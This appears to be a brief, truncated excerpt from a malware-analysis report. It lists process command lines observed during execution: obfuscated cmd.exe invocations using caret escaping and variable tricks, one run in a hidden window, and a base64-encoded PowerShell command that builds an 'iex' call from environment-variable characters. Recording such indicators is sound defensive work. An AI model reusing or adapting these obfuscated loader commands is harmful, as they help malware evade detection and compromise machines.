Technical information
- '<SYSTEM32>\cmd.exe' jfkHMIjziHk jjPvMLiGRdALZtZPVMp jwZCtAJ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %KdIiqpvOTmJdYzV%=CkvmPGkMu&&set %I<File name>suIYkm%=p&&set %XaubvbwGN%=o^...
- '<SYSTEM32>\cmd.exe' jfkHMIjziHk jjPvMLiGRdALZtZPVMp jwZCtAJ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %KdIiqpvOTmJdYzV%=CkvmPGkMu&&set %I<File name>suIYkm%=p&&set %XaubvbwGN%=o^...' (with a hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACAAKAAgACQAZQBuAFYAOgBDAG8AbQBTAFAARQBDAFsANAAsADIANgAsADIANQBdAC0ASgBvAGkAbgAnACcAKQAgACgATgBlAFcALQBPAGIASgBFAEMAVAAgAEkATwAuAHMAdAByAEUAYQBNAFIAZQBhAGQARQBSACgAKABOAGUAVwAtAE8AYgBKAE...